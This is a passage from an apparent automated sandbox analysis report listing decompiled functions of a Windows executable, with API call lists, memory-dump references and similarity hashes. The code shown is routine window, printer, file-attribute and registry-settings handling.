				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E00413767();
					if(_t83 != _a12) {
						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E00413740(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E004152C7( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

APIs

GetClientRect.USER32 ref: 004151C0
BeginDeferWindowPos.USER32 ref: 004151CE
GetTopWindow.USER32(?), ref: 004151E0
GetDlgCtrlID.USER32 ref: 004151EF
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00415221
GetWindow.USER32(00000000,00000002), ref: 0041522A
CopyRect.USER32 ref: 00415246

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041264E, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041264E(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								E0041A92B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041A92B( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 0041266E
lstrcmpA.KERNEL32(?,?), ref: 0041267A
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
GlobalLock.KERNEL32 ref: 004126C4
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728

Uniqueness

Uniqueness Score: -1.00%

Function 0042322D, Relevance: 12.1, APIs: 8, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042322D(intOrPtr __ecx) {
				int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				int _t35;
				long _t39;
				intOrPtr _t40;
				int _t42;
				void* _t43;

				_v12 = __ecx;
				_v8 = GetSystemMetrics(6);
				_t39 = GetSystemMetrics(5);
				_t35 = GetSystemMetrics(0x21);
				_t42 = GetSystemMetrics(0x20);
				_v28.top = _v8;
				_t24 =  *0x439c98; // 0x0
				_v28.left = _t39;
				_v28.right = _t24 - _t39;
				_t26 =  *0x439c9c; // 0x0
				_v28.bottom = _t26;
				if((E00416528(_v12) & 0x00040600) != 0) {
					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
				}
				_t40 = _v12;
				_push(GetWindowDC( *(_t40 + 0x1c)));
				_t43 = E00419BA2();
				InvertRect( *(_t43 + 4),  &_v28);
				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
			}

APIs

GetSystemMetrics.USER32 ref: 00423241
GetSystemMetrics.USER32 ref: 00423248
GetSystemMetrics.USER32 ref: 0042324E
GetSystemMetrics.USER32 ref: 00423254

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

OffsetRect.USER32(?,00000000,?), ref: 0042328D
GetWindowDC.USER32(?,?,?,?), ref: 00423299
InvertRect.USER32(?,?), ref: 004232AE
ReleaseDC.USER32 ref: 004232BA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00418C88, Relevance: 10.6, APIs: 7, Instructions: 148
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00418C88(void* __ecx) {
				void* __esi;
				void* _t60;
				CHAR* _t83;
				void* _t95;
				struct _SECURITY_DESCRIPTOR* _t101;
				signed int _t102;
				void* _t120;
				CHAR** _t124;
				void* _t126;

				E00406520(E00429FC8, _t126);
				_t120 = __ecx;
				_t124 = __ecx + 0x10;
				E00416A77(_t124, _t124);
				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
					_t83 =  *0x436980; // 0x436994
					 *(_t126 - 0x10) = _t83;
					_t102 = 0;
					_push(_t126 - 0x10);
					 *(_t126 - 4) = 0;
					E00417BF9(_t126,  *(_t126 + 8));
					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
					}
					_t91 =  *((intOrPtr*)(_t126 - 0x144));
					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
						_push(1);
						_push( *(_t126 + 8));
						_push(_t126 - 0x14);
						_t95 = E00418BE2(_t136);
						 *(_t126 - 4) = 1;
						E00416B95(_t124, _t126, _t95);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						E00416AEC(_t126 - 0x14);
					}
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					E00416AEC(_t126 - 0x10);
				}
				_t58 =  *_t124;
				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
					E00416A77(_t124, _t124);
					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
				} else {
					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
						E0041837E(_t126 - 0x150, _t126 - 0x18);
						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
					}
					 *(_t126 + 0xc) = 0;
					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
						_t101 = E004131DD( *(_t126 + 0xc));
						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
							SetFileSecurityA( *_t124, 4, _t101);
						}
						E00413206(_t101);
					}
					_t60 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t60;
			}

APIs

__EH_prolog.LIBCMT ref: 00418C8D
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5

Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64

Uniqueness

Uniqueness Score: -1.00%

Function 00415F1B, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00415F1B(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E004126FB() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E0041668C(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E004126FB();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E00429977(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E0041668C(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E00416528(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

APIs

GetParent.USER32(?), ref: 00415F4F
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
UpdateWindow.USER32(?), ref: 00415F94
SendMessageA.USER32(?,00000121,00000000,?), ref: 00415FBA
SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00415FD9
UpdateWindow.USER32(?), ref: 0041601C
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004296EA, Relevance: 10.6, APIs: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				long _t45;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t41 = _t48->cx;
							if(_t41 >= 0x4000) {
								goto L6;
							}
							_t45 = _t39->cx;
							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
								_t41 = _t41 + _t41;
								_t48->cx = _t41;
								_t39->cx = _t45 + _t45;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t41 =  *(_t51 + 0x34);
							if(_t41 >= 0x4000) {
								goto L11;
							}
							_t43 =  *(_t51 + 0x3c);
							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t41;
								 *(_t51 + 0x3c) = _t43 + _t43;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E004297EF(_t51);
				}
				return _t26;
			}

APIs

GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
GetDeviceCaps.GDI32(?,00000058), ref: 00429779
GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
SetMapMode.GDI32(00000000,00000008), ref: 004297BC
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF70, Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
GetMessageA.USER32 ref: 0041FF9B
DispatchMessageA.USER32 ref: 0041FFAE
SetRectEmpty.USER32(?), ref: 0041FFD7
GetDesktopWindow.USER32 ref: 0041FFEF
LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64

Uniqueness

Uniqueness Score: -1.00%

Function 004152C7, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

APIs

GetParent.USER32(?), ref: 004152D4
GetWindowRect.USER32 ref: 004152EE
ScreenToClient.USER32 ref: 00415301
ScreenToClient.USER32 ref: 0041530A
EqualRect.USER32 ref: 00415314
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction ID: 07014e229ed6a7b25482b6998f11fd7e237ae46f5a3226271598de642c651d74
Opcode Fuzzy Hash: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction Fuzzy Hash: FB117F76600609FFE7109F68CC88EBBBBBDEB88710F108529B91593215E774AD418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425DE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425DE9(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x00425dff
0x00425e0b
0x00425e0e
0x00425e11
0x00425e14
0x00425e1f
0x00425e59
0x00425e59
0x00425e64
0x00425e69
0x00425e69
0x00425e6e
0x00425e73
0x00425e73
0x00425e7c

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73

Strings

software, xrefs: 00425E01

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction ID: 0af0f3997741b28716963c04c81515c15655377052ffcc376828dcfe476aa2da
Opcode Fuzzy Hash: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction Fuzzy Hash: 0311F872A00528FBCB21CB96DC84DEFFFBCEF89744F5000AAA515A2121D3705A01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E00404DD2() == 0) {
					if(_a4 != 0x12340042) {
						L9:
